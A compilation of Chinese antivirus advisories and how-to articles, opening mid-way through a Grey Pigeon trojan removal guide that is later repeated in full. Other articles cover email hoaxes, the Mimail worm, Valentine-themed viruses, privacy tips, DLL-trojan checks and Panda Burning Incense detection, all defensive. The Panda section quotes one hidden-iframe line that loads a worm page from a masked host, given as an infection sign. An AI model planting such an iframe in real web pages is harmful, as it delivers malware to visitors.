    Windows目录下的G_Server.exe文件将自己注册成服务（9X系统写注册表启动项），每次开机都能自动运行，运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能，与控制端客户端进行通信；G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此，中毒后，我们看不到病毒文件，也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同，G_Server_Hook.dll有时候附在Explorer.exe的进程空间中，有时候则是附在所有进程中。

    灰鸽子的手工检测

    由于灰鸽子拦截了API调用，在正常模式下木马程序文件和它注册的服务项均被隐藏，也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外，灰鸽子服务端的文件名也是可以自定义的，这都给手工检测带来了一定的困难。

    但是，通过仔细观察我们发现，对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出，无论自定义的服务器端文件名是什么，一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点，我们可以较为准确手工检测出灰鸽子木马。

    由于正常模式下灰鸽子会隐藏自身，因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择“Safe Mode”或“安全模式”。

    1、由于灰鸽子的文件本身具有隐藏属性，因此要设置Windows显示所有文件。打开“我的电脑”，选择菜单“工具”—》“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。





    2、打开Windows的“搜索文件”，文件名称输入“_hook.dll”，搜索位置选择Windows的安装目录（默认98/xp为C:windows，2k/NT为C:Winnt）。 




3、经过搜索，我们在Windows目录（不包含子目录）下发现了一个名为Game_Hook.dll的文件。




4、根据灰鸽子原理分析我们知道，如果Game_Hook.DLL是灰鸽子的文件，则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录，果然有这两个文件，同时还有一个用于记录键盘操作的GameKey.dll文件。
 



    经过这几步操作我们基本就可以确定这些文件是灰鸽子木马了，下面就可以进行手动清除。另外，如果你发现了瑞星杀毒软件查不到的灰鸽子变种，也欢迎登陆瑞星新病毒上报网站（http://up.rising.com.cn）上传样本。

    灰鸽子的手工清除

    经过上面的分析，清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作，主要有两步：1、清除灰鸽子的服务；2删除灰鸽子程序文件。

    注意：为防止误操作，清除前一定要做好备份。

    一、清除灰鸽子的服务

    2000／XP系统：

    1、打开注册表编辑器（点击“开始”－》“运行”，输入“Regedit.exe”，确定。），打开 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices注册表项。

    2、点击菜单“编辑”－》“查找”，“查找目标”输入“game.exe”，点击确定，我们就可以找到灰鸽子的服务项（此例为Game_Server）。




    3、删除整个Game_Server项。

    98／me系统：

    在9X下，灰鸽子启动项只有一个，因此清除更为简单。运行注册表编辑器，打开HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun项，我们立即看到名为Game.exe的一项，将Game.exe项删除即可。




    二、删除灰鸽子程序文件

    删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然后重新启动计算机。至此，灰鸽子已经被清除干净。

    小结

    本文给出了一个手工检测和清除灰鸽子的通用方法，适用于我们看到的大部分灰鸽子木马及其变种，然而仍有极少数变种采用此种方法无法检测和清除。同时，随着灰鸽子新版本的不断推出，作者可能会加入一些新的隐藏方法、防删除手段，手工检测和清除它的难度也会越来越大。当你确定机器中了灰鸽子木马而用本文所述的方法又检测不到时，最好找有经验的朋友帮忙解决。

    同时随着瑞星杀毒软件2005版产品发布，杀毒软件查杀未知病毒的能力得到了进一步提高。经过瑞星公司研发部门的不断努力，灰鸽子病毒可以被安全有效地自动清除，需要用户手动删除它的机会也将越来越少。

恶作剧邮件诱人上钩,不是病毒装病毒！
反病毒公司趋势科技和McAfee昨日宣布，一种恶作剧电子邮件近日在网上迅速传播，它向用户谎称其电脑中藏有名为“sulfnbk.exe”病毒，并一步步诱使用户将该文件删除，最终导致系统出现问题。

　　这种恶作剧邮件煞有介事地说，用户电脑中隐藏的“sulfnbk.exe”病毒将在6月1日发作，届时将删除硬盘中的所有文件和文件夹；邮件还谎称，该“病毒”已通过电子邮件潜入C盘的Windows文件夹下，并逐步“指导”用户搜索硬盘、找出并删除该“病毒”。

　　反病毒专家指出，“sulfnbk.exe”根本不是病毒，而是Windows 98和Windows Me的一个系统文件，其作用是恢复长文件名。幸而这一文件不是很重要，即使被删除，也可从Windows安装盘中提取出来。

　　据趋势科技调查，该恶作剧邮件在本月初开始传播时是用葡萄牙语撰写的，两周后被好事者翻译成英语。几天前，有人还嫌它的影响力不够大，又添油加醋地描述了“病毒”的破坏力并指明发作日期。该公司说，确实有不少用户受到这一邮件的蒙骗。

　　专家指出，后缀名为exe的可执行文件确实易被病毒感染，但最好的判断方法是用杀毒软件查杀，而不是简单地删除了事。

紧急警报:小邮差惊现第18个变种 破坏力居家族之首
2月3日，瑞星全球反病毒监测网在国内率先截获恶性蠕虫病毒“小邮差”的最新变种：“小邮差变种R(Worm.Mimail.R)”，并决定于当日进行紧急升级。小邮差病毒在春节期间的异常活跃，先后出现过3个不同的变种，本次发现的病毒是“小邮差”家族的第18个变种，也是迄今为止最厉害的一个变种。该病毒除了会通过伪装信用卡信息填写栏窃取用户信用卡资料、向外发送带毒邮件进行网络传播之外，该病毒还会在被感染电脑上建立两个安全后门、盗取用户的安全信息，给用户电脑带来持续的破坏。

    病毒感染电脑后会建立一个端口为3000的远程shell后门和一个端口为6667的后门，通过这两个后门，病毒就可以和外界沟通，执行各种黑客程序来控制用户的电脑。该病毒还会搜索用户的Cookies信息，寻找“e-gold.com”的字符串，如果找不到，病毒就会扫描电脑中的服务端口，将一些安全服务信息保存在c:serv.txt文件中，并在用户上网时将该文件发送到指定的邮箱，据瑞星反病毒工程师分析，这样做的目的是使病毒作者能够了解被感染电脑的安全状况，对用户电脑进行后续的控制与破坏。

    此外，病毒还会提取用户的email地址记录，向外发送大量的带毒邮件传播网络，然后释放文件：c:wind.gif、c:logobig.gif、c:logo.jpg、c:mshome.hta，并执行其中的脚本文件，出现病毒伪装的信用卡输入框，由于病毒自带了图片，因此界面更好看，更具迷惑性，信用卡用户特别要提高警惕，注意分辨。

    瑞星反病毒专家提醒用户：刚经过春节长假的人们，安全防范意识相对会较低，更易被病毒感染。因此广大的电脑用户要注意病毒的防范，发现电脑异常应及时采取措施，及时升级杀毒软件，并打开实时监控系统来保障电脑安全。

    瑞星公司于今日（2月3日）对该病毒进行升级，对手中没有杀毒软件的用户，可以登陆：http://online.rising.com.cn使用免费在线查毒产品或登陆使用该病毒的免费专杀工具进行清毒。瑞星杀毒软件的用户只要将手中的杀毒软件升级到16.12.01即可完全清除该病毒，用户还可以随时拨打瑞星反病毒急救电话：010-82678800来寻求反病毒专家的帮助！

爱情背后的幽灵--情人节与病毒
爱情是美丽、永恒的主题，所以就有了2月14日的情人节。网络时代，爱情依然在被吟唱，只是又多了一位主角—病毒。这些“幽灵”伪装成传送爱情信件的使者，穿梭于网络之间。人们往往会被那些美丽、浪漫的词藻所诱惑，而屡屡中招，那么硬盘被格式化、要么系统造成崩溃。

    一 病毒的恋爱—“爱虫”

    爱情是每个人的权利，所以，我要恋爱，就连病毒也不例外。

    “爱虫”病毒（vbs.loveletter）是一个比较著名的病毒，在2000年的青年节（5月4日）通过互联网传遍全球，它会给每一个渴望爱情的人们发送一封附件名为：Love-Letter-for-you.txt.vbs的病毒邮件，如果用户以为是一封情书而观看的话，病毒便被激活，它会使机器中的十二种文件，将这些文件全部“打上病毒的烙印”，病毒的充分传染，最终会使您的系统崩溃。



    二 病毒情人—“罗米欧与朱丽叶”

    病毒也要告诉你一个关于“罗米欧与朱丽叶”的故事

    “罗米欧与朱丽叶”的故事吸引着古往今来无数人的感谓，已经成了西方爱情的代名词，所以当你收到附件如My Romeo（我的罗米欧）和My Juliet（我的朱丽叶）的邮件时，您会不动心吗？当您动心之时，也就是机器遭殃之日，（worm. Blebla）病毒同样是感染系统中的所有网页类文件，并向发送大量邮件，进行传播。



    三 病毒的约会—“我的晚会”

    我的晚会， 你能拒绝吗？

    如果我请你参加我的晚会，你会拒绝吗？对于恋爱中的情人来说，如果女方收到了这样的邀请信，不但不会拒绝，相反还会很感动，“我的晚会”病毒(worm.myparty)就是利用了人们这样的心理，会发送标题是：“new photos from my party!”

    内容是：Hello
          My party... It was absolutely amazing!
          I have attached my web page with new photos!
          If you can please make color prints of my photos. Thanks!
    附件是： www.myparty.yahoo.com的病毒邮件，如果你信以为真，不但晚会去不成，连计算机也会被病毒控制，病毒会为所欲为。



    四 病毒的”情人节”

    恋爱的人们，来过情人节吧。

    虽然单身汉们总是在落寞地吟唱着“没有情人的情人节”，但有了情人的情人节如果碰到这个病毒,我想心情也不会好多少。该病毒就是“情人节”病毒(vbs.valentin).它会藏在网页文件中并将自已加密，然后通过邮件系统将“情人节的祝福”送到世界各地，附件名是: loveday14-b.hta, 怎么样，够浪漫吧，但如果你查看了该附件，病毒就会运行并监视系统，当机器时间是2月14日时（每个情人不会不知道的节日），病毒便会发作，会将计算机C盘中的所有文件，用一些西班牙语的文本进行覆盖，这就是“情人节”送给你的礼物，下次开机时，C盘系统将会荡然无存，让你在情人节这天永远也不会忘记这个病毒。



    情人节即将来到，浪漫的人们也一定要注意防毒，在网上约会情人的时候，不要成为这些情人病毒的下一个猎物。

    赶快杀毒吧！

不一样的“情人节”病毒
情人节的出现，使天下的男女又多了一个可以在一起的节日，但网恋的男女就没有这么幸运了，他们不但要冒着对方是“恐龙” 的危险，它们还要防止一件事，就是病毒的侵扰，尤其是邮件病毒和网页类病毒，它们会随着节日里上网与收发邮件的激增而大量泛滥。

    情人节到了，下面就给大家介绍几个不同类型的“情人节”病毒，使大家了解一下病毒与情人节的故事。

    情人节（vbs.Valentin）病毒是一个会写情书的病毒。它会将自身用脚本加密引擎加密后插入到HTML文件中，病毒运行时会产生一个名为Main.htm的病毒文件，并拷贝到系统目录中。并搜索outlook的地址薄中的所有邮件地址，向这些地址发送标题为：Feliz san valentin，内容为：Feliz san valentin. Por favor visita...的病毒邮件。

    该病毒还会通过网络聊天工具mIRC的共享目录，并在mIRC的文件夹下建立Script.ini文件，当mIRC下次启动时，病毒便会自动运行，继续传播。

    病毒会在每个月的14号发作，发作时会以一封西斑牙情书的内容覆盖掉硬盘中的所有文件，并将覆盖过的文件扩展名全部改为.txt，使用户的系统完全崩溃，这封情书的内容如下：

    Hola, me llamo Onel2 y voy a utilizar tus archivos para declararle mi amor
    a Davinia, la chica mas guapa del mundo.
    Feliz san Valentin Davinia. Eres la mas bonita y la mas simpatica.
    Todos los dias a todas horas pienso en ti y cada segundo que no te veo
    es un infierno.
    Quieres salir conmigo?
    En cuanto a ti usuario, debo decirte que tus ficheros
    no han sido contaminados por un virus,
    sino sacralizados por el amor que siento por Davinia

    桑河情人（VBS.San）病毒是一个会删除了你的文件还要祝你情人节快乐的病毒。病毒运行时会产生一个Loveday14-a.hta的文件，该文件是编译过的病毒格式，可以被系统自动执行。病毒会将这个情人节的文件放入系统的启动目录，每次开机会病毒会自动运行

    该病毒还会产生一个index.htm的病毒文件，然后拷贝到windows的系统目录下,并将该文件加为outlook邮箱的默认信纸文件，这样，只要用户发信，就可以自动将该病毒发送出去。

    该病毒在每个月8、14、23、29号发作，发作时会将c盘的所有根目录都保留，只将这些根目录中的所有文件及子目录都删除，而且还会建立一个名为：”happysanvalentin”(情人节快乐)的目录，来示威。用户除了系统崩溃外也只能苦笑了，大概这就是爱的代价吧。

    亲密爱人（vbs.candylove）病毒是最浪漫的病毒。该病毒运行时会在C:WINDOWS目录或C:WINNT目录下产生一个名为：ilove.vbs的病毒文件，并修改注册表的自启动项，以便每次开机时自动运行该病毒。

    该病毒会通过系统的wscript引擎无穷地自制自身，感染硬盘中的所有目录。每次会在：Te amo.vbs、Te quiero.vbs、Solo pienso en ti.vbs、Eres lo mejor.vbs、Poemas de amor.vbs、Amigo.vbs这六个文件名中随机选择一个做为病毒文件名，病毒还会对自己的感染进行计数，当病毒发现自己已经感自制了1000次以上，病毒便自动弹出关于情人节的消息框：

    feliz día de san valentín, día del amor, día de la amistad, dia de los enamorados...
    son los mejores desceos del  (FBI) Fuerza Bruta Inteligente ...Hacked oaxaca....tqm..
    cualquier comentario escribir a anonimomix@mixmail.com以示炫耀。

    该病毒在传染时会消耗大量的系统资源，导致系统变慢至到系统停止响应。

    该病毒会在每年的情人节时发作（2月14日），发作时会删除windows文件夹中的所有文件并且执行记事本的1001个拷贝。

系统安全：系统安全之教你手工清除灰鸽子Vip2005
手工清除灰鸽子并不难，重要的是我们必须懂得它的运行原理。

　　灰鸽子的运行原理

　　灰鸽子远程监控软件分两部分：客户端和服务端。黑客（姑且这么称呼吧）操纵着客户端，利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe，然后黑客通过各种渠道传播这个服务端（俗称种木马）。种木马的手段有很多，比如，黑客可以将它与一张图片绑定，然后假冒成一个羞涩的MM通过QQ把木马传给你，诱骗你运行；也可以建立一个个人网页，诱骗你点击，利用IE漏洞把木马下载到你的机器上并运行；还可以将文件上传到某个软件下载站点，冒充成一个有趣的软件诱骗用户下载……这正违背了我们开发灰鸽子的目的，所以本文适用于那些让人非法安装灰鸽子服务端的用户，帮助用户删除灰鸽子Vip2005的服务端程序。本文大部分内容摘自互联网。

　　G_Server.exe运行后将自己拷贝到Windows目录下(Windows98/xp下为系统盘的windows目录，Windows2000/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe时，生成的文件就是A.exe、A.dll和A_Hook.dll。

　　Windows目录下的G_Server.exe文件将自己注册成服务（9X系统写注册表启动项），每次开机都能自动运行，运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能，与控制端客户端进行通信；G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此，中毒后，我们看不到病毒文件，也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同，G_Server_Hook.dll有时候附在Explorer.exe的进程空间中，有时候则是附在所有进程中。

　　灰鸽子的手工检测

　　由于灰鸽子拦截了API调用，在正常模式下服务端程序文件和它注册的服务项均被隐藏，也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外，灰鸽子服务端的文件名也是可以自定义的，这都给手工检测带来了一定的困难。

　　但是，通过仔细观察我们发现，对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出，无论自定义的服务器端文件名是什么，一般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点，我们可以较为准确手工检测出灰鸽子服务端。

　　由于正常模式下灰鸽子会隐藏自身，因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择“Safe Mode”或“安全模式”。

　　1、由于灰鸽子的文件本身具有隐藏属性，因此要设置Windows显示所有文件。打开“我的电脑”，选择菜单“工具”—》“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，然后点击“确定”。

　　2、打开Windows的“搜索文件”，文件名称输入“_hook.dll”，搜索位置选择Windows的安装目录（默认98/xp为C:\windows，2k/NT为C:\Winnt）。

　　3、经过搜索，我们在Windows目录（不包含子目录）下发现了一个名为Game_Hook.dll的文件。

　　4、根据灰鸽子原理分析我们知道，如果Game_Hook.DLL是灰鸽子的文件，则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录，果然有这两个文件，同时还有一个用于记录键盘操作的GameKey.dll文件。

　　经过这几步操作我们基本就可以确定这些文件是灰鸽子服务端了，下面就可以进行手动清除。

　　灰鸽子的手工清除

　　经过上面的分析，清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作，主要有两步：1、清除灰鸽子的服务；2删除灰鸽子程序文件。

　　注意：为防止误操作，清除前一定要做好备份。

　　一、清除灰鸽子的服务

　　Windows2000／WindowsXP系统：

　　1、打开注册表编辑器（点击“开始”－》“运行”，输入“Regedit.exe”，确定。），打开


　　HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services



　　注册表项。
　　2、点击菜单“编辑”－》“查找”，“查找目标”输入“game.exe”，点击确定，我们就可以找到灰鸽子的服务项（此例为Game_Server）。

　　3、删除整个Game_Server项。

　　Windows98／WindowsME系统：

　　在Windows9X下，灰鸽子启动项只有一个，因此清除更为简单。运行注册表编辑器，打开


　　HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run



　　项，我们立即看到名为Game.exe的一项，将Game.exe项删除即可。
　　二、删除灰鸽子程序文件

　　删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的Game.exe、Game.dll、Game_Hook.dll以及Gamekey.dll文件，然后重新启动计算机。至此，灰鸽子VIP 2005服务端已经被清除干净。

系统安全知识：菜鸟安全防护Windows八大保密技巧
Windows自带的功能，为了方便我们的使用，有自动记录的功能，但是这些功能有些事情也把我们的“行踪”给暴露了，这个时候应该怎么办呢？请看本文为你介绍的八种方法，可以让你使用的电脑了无痕迹。

　　1.彻底地一次删除文件

　　首先，应从系统中清除那些你认为已肯定不用的文件，这里我们指的是你丢弃到回收站中的所有垃圾文件。当然，我们还可以在任何想起的时候把回收站清空(双击回收站图标，然后选择“文件”菜单，再选择“清空回收站(B)” 命令)，但更好的方法是关闭回收站的回收功能。要彻底地一次删除文件，可右击回收站图标，选择“属性”，然后进入“全局”选项卡，选择“所有驱动器均使用同一设置(U):”，并在“删除时不将文件移入回收站，而是彻底删除(R)”复选框打上选中标记。

　　本步骤是不让已经被删除的文件继续潜藏在回收站中。

　　2.不留下已删除文件的蛛丝马迹

　　即使窥探者无法直接浏览文档内容，他们也能通过在MicrosoftWord或Excel的“文件”菜单中查看你最近使用过哪些文件来了解你的工作情况。这个临时列表中甚至列出了最近已经被你删除的文件，因此最好关闭该项功能。在 Word或Excel中，选择“工具”菜单，再选择“选项”菜单项，然后进入“常规”选项卡，在“常规选项”中取消“列出最近所用文件(R)”前面的复选框的选中标记。

　　本步骤是消除最近被删除的文件留下的踪迹，为此，在 Word、Excel和其它常用应用程序中清除“文件”菜单中的文件清单。

　　3.隐藏文档内容

　　应隐藏我们目前正在使用着的文档的踪迹。打开“开始”菜单，选择“文档”菜单项，其清单列出了你最近使用过的约 15个文件。这使得别人能够非常轻松地浏览你的工作文件或个人文件，甚至无需搜索你的硬盘。要隐藏你的工作情况，就应将该清单清空。为此，你可以单击“开始”菜单中的“设置”菜单项，然后选择“任务栏和开始菜单”，进入“任务栏和开始菜单”，再选择“高级”选项卡，单击该选项卡中的“清除(C)”按钮即可。

　　本步骤是在Windows“开始”菜单中，清除“文档”菜单项所包含的文件，把这些文件隐藏起来。

　　4.清除临时文件

　　Microsoft Word和其它应用程序通常会临时保存你的工作结果，以防止意外情况造成损失。即使你自己没有保存正在处理的文件，许多程序也会保存已被你删除、移动和复制的文本。应定期删除各种应用程序在WINDOWSTEMP文件夹中存储的临时文件，以清除上述这些零散的文本。还应删除其子目录(如 FAX和WORDXX目录)中相应的所有文件。虽然很多文件的扩展名为TMP，但它们其实是完整的DOC文件、HTML文件，甚至是图像文件。

　　本步骤是清除硬盘上的临时文件和无用文件。

　　5.保护重要文件

　　对重要文件进行口令保护，这在 Word和Excel中很容易实现。依次选择“文件”、“另存为”，然后选择“工具”中的“常规选项”，在“打开权限密码”和“修改权限密码”中输入口令，最好不要使用真正的单词和日期作为口令，可以混合使用字母、数字和标点符号，这样口令就很难破译。当然，以后每当你打开和修改文档时，都必须输入口令。

　　本步骤可以为我们重要的文件加上一把锁。

　　6.改写网页访问历史记录

　　浏览器是需要保护的另一个部分。现在大多数的用户因为安装了微软公司的视窗系统，所以使用Internet Explorer作为上网所使用的浏览器。Internet Explorer会把访问过的所有对象都会列成清单，其中包括浏览过的网页、进行过的查询以及曾输入的数据。Internet Explorer 把网页访问历史保存在按周划分或按网址划分的文件夹中。我们可以单个地删除各个“地址(URL)”，但最快的方法是删除整个文件夹。要清除全部历史记录，可在“工具”菜单中选择“Internet 选项”，然后选择“常规”选项卡，并单击“清除历史记录”按钮。

　　本步骤是清除浏览器的历史记录。

　　7.输入网址但不被记录

　　Internet Explorer记录你在浏览器中输入的每个网址，你不妨验证一下:在工具栏下边的地址窗口中输入一个 URL地址，浏览器将把该地址　记录在下拉菜单中，直到有其它项目取代了它。你可以通过下面的方法访问网站，而所使用的网址将不被记录:在浏览器中可以按下Ctrl-O键，然后在对话框中输入URL地址即可。

　　本步骤可以使访问过的网址不被记录。

　　8.清除高速缓存中的信息

　　Internet Explorer在硬盘中缓存你最近访问过的网页。当你再次访问这些网页时，高速缓存信息能够加快网页的访问速度，但这也向窥探者揭开了你的秘密。要清除高速缓存中的信息，在Internet Explorer中，应在“工具”菜单中选择“Internet 选项”，然后进入“常规”选项卡，单击“删除文件”按钮。

系统安全知识：Windows操作系统常遇木马预防技巧
木马程序是目前比较流行的一类病毒文件，它与一般的病毒不同，它不会自我繁殖，也并不刻意地去感染其他文件。它通过将自身伪装吸引用户下载执行，或以捆绑在网页中的形式，当用户浏览网页时受害。木马程序向施种木马者提供打开被种者电脑的门户，使施种者可以任意毁坏、窃取被种者的文件和隐私，甚至远程操控被种者的电脑。木马的原理和计算机网络中常常要用到的远程控制软件相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性;而木马程序则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是毫无价值的。

　　木马通常有两个可执行程序:一个是客户端，即控制端，另一个是服务端，即被控制端。木马的设计者为了防止木马被发现，而采用多种手段隐藏木马。木马的服务一旦运行，电脑就会有一个或几个端口被打开，黑客就可以利用控制端进入运行了服务端的电脑，甚至可以控制被种者的电脑，所以被种者的安全和个人隐私也就全无保障了!

　　随着微软的操作系统从Win9X过渡到WinNT系统(包括2000/xp/2003)，微软的任务管理器也一下子“脱胎换骨”，变得“火眼金睛”起来 (在Win9X中，只需要将进程注册为系统服务就能够从进程查看器中隐形，可是这一切在WinNT中却完全不同，无论木马从端口、启动文件上如何巧妙地隐藏自己，始终都不能欺骗WinNT的任务管理器)，这使得以前在win9X操作系统下靠将进程注册为系统服务就能够从任务管理器中隐形的木马面临前所未有的危机，所以木马的开发者及时调整了开发思路，转入了开发可以躲避WinNT的任务管理器的进程查询的动态嵌入式DLL木马。

　　要弄清楚什么是动态嵌入式DLL木马，我们必须要先了解Windows系统的另一种“可执行文件”——DLL，DLL是Dynamic Link Library(动态链接库)的缩写，DLL文件是Windows的基础，因为所有的API函数都是在DLL中实现的。DLL文件没有程序逻辑，是由多个功能函数构成，它并不能独立运行，DLL文件一般都是由进程加载并调用的。

　　因为DLL文件不能独立运行，所以在进程列表中并不会出现DLL。所以木马的开发者就通过编写动态嵌入式DLL木马，并且通过别的进程来运行它，那么无论是入侵检测软件还是进程列表中，都只会出现那个进程而并不会出现那个DLL木马。如果那个进程是可信进程(例如资源管理器Explorer.exe)，那么就没人会怀疑DLL文件也是个木马了。从而木马就又实现了自己的隐蔽性的功能，所以，预防DLL木马也是相当重要的。

　　在WinNT系统，DLL木马一般都藏在System32目录下(因为System32是系统文件存放的目录，里面的文件很多，在里面隐藏当然很方便了)，针对这一点我们可以在安装好系统和必要的应用程序后，对该目录下的EXE和DLL文件作一次记录:点击开始—运行—输入cmd回车—出现DOS命令行模式—输入cd\回车，再输入cd C:\Windows\System32回车，这就转换目录到了System32目录(要还是不知道怎么进入的，请参看DOS的cd命令的使用)，输入命令:dir *.exe>exebackup.txt & dir *.dll>dllbackup.txt回车。

　　这样，我们就把System32目录下所有的exe文件和所有的dll文件都记录在exebackup.txt和dllbackup.txt里面了。日后如发现系统异常而用传统的方法又查不出问题时，则要考虑是不是系统中已经潜入了DLL木马。

　　这时我们用同样的方法将System32目录下的EXE和DLL文件记录到另外exebackup1.txt和dllbackup1.txt中，然后运行 CMD—fc exebackup.txt exebackup1.txt>different.txt & fc dllbackup.txt dllbackup1.txt>different.txt(使用FC命令比较前后两次的DLL和EXE文件，并将结果输入到 different.txt中)，这样我们就能发现一些多出来的DLL和EXE文件，然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。

　　没有是最好，如果有的话也不要直接删除掉，可以先把它移到回收站里，若系统没有异常反应再将之彻底删除，或者把DLL文件上报给反病毒研究中心检查。
　　
　　最后，防治木马的危害，专家建议大家应采取以下措施:

　　第一，安装反病毒软件和个人防火墙，并及时升级。

　　第二，把个人防火墙设置好安全等级，防止未知程序向外传送数据。

　　第三，使用安全性比较好的浏览器和电子邮件客户端工具。

　　第四，操作系统的补丁要经常进行更新。

　　第五，不要随便打开陌生网友传送的文件和下载、使用破解软件。

　　相信大家只要做好安全防护工作，防治木马并不是那么可怕的。

“熊猫烧香”病毒疯狂肆虐 专家教你如何快速识别
目前，“尼姆亚（也称熊猫烧香）”病毒正在互联网上肆虐。该病毒采用“熊猫烧香”头像作为图标，诱使用户运行。该变种会感染用户计算机上的EXE可执行文件，被病毒感染的文件图标均变为“熊猫烧香”。同时，受感染的计算机还会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。该病毒可通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致整个局域网瘫痪，无法正常使用。

    据悉，目前多家著名网站已经遭到此类攻击，而相继被植入病毒。由于这些网站的浏览量非常大，致使此次“熊猫烧香”病毒的感染范围非常广，中毒企业和政府机构已经超过千家，其中不乏金融、税务、能源等关系到国计民生的重要单位。

    如果用户的电脑中出现下列现象之一，则表明已经中毒，就应该立刻采取措施清除该病毒。

一、程序的图标变成“熊猫烧香”

    熊猫烧香病毒会感染计算机上的EXE可执行文件，被该病毒感染的文件图标会变成一只熊猫手捧三炷香的样子。


图一：文件图标被更改为“熊猫烧香”

二、在硬盘根目录下生成“熊猫烧香”图标的文件

    1、打开“我的电脑”，用鼠标右键点击“C盘”、“D盘”等图标，在弹出的菜单中会出现名为“Auto”的项目。


图二：右键菜单被添加名为“Auto”的项目 [点击查看大图]

    2、用一些辅助工具，如WinRAR等，可以看到根目录下有名为“setup.exe”和“autorun.inf”的文件，其中“setup.exe”的图标为“熊猫烧香”。


图三：硬盘根目录下生成“熊猫烧香”图标的文件 [点击查看大图]

三、网页文件被添加病毒代码

    用记事本打开HTM等格式的网页文件，若在文件尾部发现类似“<iframe src=http://www.****r.com/worm.htm width=0 height=0></iframe>”的内容，说明计算机已感染“熊猫烧香”病毒。

    注：“src=”后面的网址，不同的病毒变种会有所区别。



图四：网页文件被添加病毒代码 [点击查看大图]

    瑞星已经发布针对该病毒的专杀工具，所有用户均可以去瑞星网站（http://it.rising.com.cn/Channels/Service/index.shtml）免费下载使用。

“熊猫烧香”病毒疯狂肆虐 专家教你如何进行防范
目前，“尼姆亚（也称熊猫烧香）”病毒正在互联网上肆虐。该病毒采用“熊猫烧香”头像作为图标，诱使用户运行。该变种会感染用户计算机上的EXE可执行文件，被病毒感染的文件图标均变为“熊猫烧香”。

    该病毒针对企业网络的攻势愈加剧烈，甚至出现了企业用户求助超过个人用户的状况。这意味着，单从感染计算机台数来看，该病毒感染的企业局域网内电脑数量已经比个人电脑多了数十倍。国外杀毒软件升级困难，使得这些企业用户面对“熊猫烧香”的疯狂攻击而束手无策。

    防范该病毒并不复杂，只需简单几步就可以使您的计算机远离“熊猫烧香”病毒。

第一，安装杀毒软件及个人防火墙升级到最新版本，并打开实时监控程序。

    由于现在海底光缆中断，很多国外杀毒软件难以升级，瑞星杀毒软件及个人防火墙免费为用户提供三个月服务，所有用户均可登陆：http://www.rising.com.cn/free/index.htm 免费下载并使用。

    瑞星个人防火墙已经升级了内置规则，只需启用“家长保护”即可阻止病毒从互联网上下载其它的病毒或进行自我升级。

第二，给管理员帐号设置较为复杂的密码。

    1、在“我的电脑”图标上单击鼠标右键，选择“管理”-〉“本地用户和组”-〉“用户”。

    2、在右边的窗格中找到具有管理员权限的帐号，用鼠标右键点击该名称，选择“设置密码”，输入新的密码。


图一：为管理员设置密码 [点击查看大图]

    3、新的密码应尽量的复杂，采用字母加数字混合，并且长度在8位以上。

第三，关闭系统“自动运行”功能

    1、点击“开始”-〉“运行”，输入“gpedit.msc”，确定，打开组策略编辑器。

    2、点击“计算机配置”-〉“管理模板”-〉“系统”，在右边的窗格中找到“关闭自动播放”一项。



图二：组策略窗口 [点击查看大图]

    3、双击该项目。在弹出的窗口中选择“已启用”，并在“关闭自动播放”的下拉菜单中选择“所有驱动器”，点击“确定”关闭该窗口。


图三：关闭“自动播放” [点击查看大图]

    4、点击“开始”-〉“运行”，输入“gpupdate”，确定，以便刷新组策略，使刚才的更改生效。

第四、安装系统和应用软件补丁

    1、打开IE浏览器，点击菜单中的“工具”-〉“WindowsUpdate”，安装所有的关键更新。

    2、QQ、UC的漏洞已经被该病毒利用，用户应该去他们的官方网站打好最新补丁。更新QQ，单击菜单按钮，选择“帮助”-〉“在线升级”。新浪UC的用户可登陆http://download.51uc.com/uc_download.shtml?tool_0下载补丁程序。

